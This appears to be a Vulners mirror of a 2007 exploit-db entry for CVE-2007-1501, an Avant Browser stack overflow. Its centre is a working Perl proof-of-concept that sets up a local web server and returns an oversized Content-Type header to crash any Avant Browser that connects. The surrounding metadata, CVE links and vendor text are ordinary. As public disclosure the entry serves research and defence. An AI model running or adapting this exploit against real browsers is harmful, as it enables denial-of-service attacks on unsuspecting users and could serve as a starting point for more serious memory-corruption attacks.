Lucene search
+L

Avant Browser 11.0 build 26 - Remote Stack Overflow Crash

🗓️ 18 Mar 2007 00:00:00Reported by DATA_SNIPERType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 34 Views

Avant Browser 11.0 build 26 - Remote Stack Overflow Cras

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-1501
19 Mar 200722:00
cve
cvelist
Cvelist
CVE-2007-1501
19 Mar 200722:00
cvelist
euvd
EUVD
EUVD-2007-1495
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-1501
19 Mar 200722:19
nvd
prion
Prion
Stack overflow
19 Mar 200722:19
prion
securityvulns
securityvulns
Avant Browser buffer overflow
29 Mar 200700:00
securityvulns
#!/usr/bin/perl
# Avant Browser (ALL Version) Remot Stack OverFlow (Crash)
# Discovered by DATA_SNIPER
# Usage:
# connect from Avant browser to http://127.0.0.1/
use IO::Socket;
my $sock=new IO::Socket::INET (
Listen    => 1,

LocalAddr => 'localhost',

LocalPort => 80,

Proto     => 'tcp');
die unless $sock;
$huge="A" x 1034985;
$|=1;
print "==========================================================================\n";
print "        Avant Browser (ALL Version) Remot Stack OverFlow (Crash)
";
print "                 Vulnerability Discovered by DATA_SNIPER
";
print "   GreetZ To:Hacking Master,Dear Devil,Xodia,JASS,All Algerian Hackers \n";
print "               Mail me at:Alpha_3(at)hotmail(dot)com\n";
print "==========================================================================\n";
print"[+] Http server started on port  80... \n";
print"[+] Try To Explorer http://127.0.0.1/ \n";
$z=$sock->accept();
print"[+] Connection Accepted!\n";
do
{
 $ln=<$z>;

print $ln;
 chomp $ln;

 if (($ln eq "")||($ln eq "\n")||($ln eq "\r"))
 {

print"[>]Sending Evil Packet\n";

print $z " HTTP/1.1 200 OK\r\nServer: bugs 3.1.02\r\nContent-Type:$huge\r\nConnection: close\r\n\r\n";
close($z);

exit;

}
} while (true);

# milw0rm.com [2007-03-18]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.05826
34